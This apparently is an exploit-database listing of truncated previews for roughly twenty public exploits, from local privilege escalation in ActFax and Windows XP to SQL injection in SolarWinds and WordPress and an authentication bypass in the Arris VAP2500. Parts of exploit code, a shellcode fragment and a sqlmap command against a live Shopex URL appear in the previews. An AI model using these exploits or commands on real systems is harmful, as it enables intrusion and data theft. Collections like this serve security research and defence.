ActFax-4.31---Local-System
Title: ActFax 4.31 Local Privilege Escalation Exploit Author: Craig Freyman @cd1zz Discovered: July 10, 2012 Vendor Notified: June 12, 2012 Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html sc = "\x89\xe5\xdb\xce\xd9\x75\xf4\x58\x50\x59\x49\x49\x49\x49"...
WinArchiver-3.2-SEH
Exploit Title: Winarchiver V 3.2 SEH Overflow Date: April 24, 2013 Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez, Miguel Angel de Castro Simon Organization: RealPentesting Vendor Homepage: http://winarchiver.com Software Link: http://www.winarchiver.com/WinArchiver3.exe zipheader =...
CCProxy-7.3-Integer-Overflow
Exploit Title: CCProxy v7.3 Integer Overflow Exploit Date: 2013/03/22 Author: Mr.XHat E-Mail: Mr.XHat GMail.com Vendor Homepage: http://www.youngzsoft.net/ Software Link: http://user.youngzsoft.com/ccproxy/update/ccproxysetup.exe Version: Prior To 7.3 hdr = "System" hdr += "\x0d\x0a" hdr +=...
VCDGear-3.50---(.cue)
Description: VCDGEAR 3.50 is prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will...
MP3Info-0.8.5a---SEH
The process memory region starts with a null byte but exploitation is still possible because of the little endian architecture provided that the return address gets placed at the end of the buffer, this however confines us in the tiny 4-byte area after pop/pop/retn Using a couple of trampolines I...
Windows-XP-SP3---BthPan.sys
Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation Advisory ID: KL-001-2014-002 Publication Date: 2014-07-18 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt from ctypes import from struct import pack from os import getpid,system from sys...
Solarwinds-Storage-Manager-5.1.0
Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit Date: May 2nd 2012 Author: muts Version: SolarWinds Storage Manager 5.1.0 Tested on: Windows 2003 Archive Url : http://www.offensive-security.com/0day/solarshell.txt import urllib, urllib2, cookielib import sys...
Novell-File-Reporter
Novell File Reporter Agent XML Parsing Remote Code Execution Vulnerability 0day CVE-2012-4959 @abysssec well just one more of our 0day got published after 2 year here is info : https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959 and here...
OpenCompact-Ftp-Server-1.2
Abusing authentication bypass in combination with a directory traversal to grab the sam file for offline cracking By Wireghoul - http://www.justanotherhacker.com Based on Serge Gorbunov's auth bypass http://www.exploit-db.com/exploits/13932/ Software Link: http://sourceforge.net/projects/open-ftp...
Apache-+-PHP-5.x
quick'n'dirty VERY UGLYY C=000DEEE IZ N0T MY STYLE : - for connect back shell start netcat/nc and bind port on given host:port - is ip-range scanner not is multithreaded, but iz multithreaded iz in random scanner and is scanner from file greets to MustLive - no ssl support - more php paths can be...
WhatsApp Remote Crash On Android
!/usr/bin/python -- coding: utf-8 - Title: WhatsApp Remote Reboot/Crash App Android Product: WhatsApp Vendor Homepage: http://www.whatsapp.com Vulnerable Versions: 2.11.476 Tested on: WhatsApp v2.11.476 on MotoG 2014 -Android 4.4.4 Date: 26/12/2014 RemoteExecution - www.remoteexecution.net Author...
CVE-2004-2771
The expand function in fio.c in Heirloom mailx 12.5 and earlier and BSD mailx 8.1.2 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in an email address...
SQL Injection in the Shopex Open Platform
Brief description: SQL injection in the Shopex open platform. Details: open platform: sqlmap -u 'http://open.shopex.cn/docs/apisearch/?methodtypeid=22&docskeyword=&platformid=0' Proof of vulnerability: Screenshot:...
CVE-2014-9357
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction...
WordPress Plugin Symposium 14.10 - SQL Injection
WordPress Plugin Symposium 14.10 - SQL Injection Exploit Title: WP Symposium 14.10 SQL Injection Date: 22-10-2014 Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek Software Link: https://downloads.wordpress.org/plugin/wp-symposium.14.10.zip Category: webap...
Device42 Traceroute Command Injection
This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'WAN Emulator v2.3 Command Execution', 'Description' = %q , 'License' = MSFLICENSE, 'Privileged' = true, 'Platform' = 'unix', 'Arch' =...
Arris VAP2500 - Authentication Bypass
Arris VAP2500 - Authentication Bypass !/usr/bin/env ruby require 'net/http' require 'digest/md5' if !ARGV0 puts "Usage: $0 " exit0 end host = ARGV0 newpass = "h4x0r3d!" http = Net::HTTP.newhost.start users = nil users = http.requestget"/admin.conf".body.split"\n".map! |user| user.sub/^.?,.$/,"\1"...
Arris VAP2500 - Authentication Bypass
!/usr/bin/env ruby require 'net/http' require 'digest/md5' if !ARGV0 puts "Usage: $0 " exit0 end host = ARGV0 newpass = "h4x0r3d!" http = Net::HTTP.newhost.start users = nil users = http.requestget"/admin.conf".body.split"\n".map! |user| user.sub/^.?,.$/,"\1" if users puts " found user accounts:...
Atrax Botnet Shell Upload Vulnerability
Exploit for php platform in category web applications import random import string import base64 import urllib import urllib2 payload = '' url = 'http://localhost/atrax/' BOTMODEINSERT = 'b' BOT MODE BOTMODERUNPLUGIN = 'e' GETPARAMMODE = 'a' GET PARAM POSTPARAMGUID = 'h' POST PARAM POSTPARAMIP = '...
D-LINK Remote Command Execution
Unauthenticated Remote Command Execution Vulnerability Type: Remote Command Execution For the exploit source code contact DSquare Security sales team...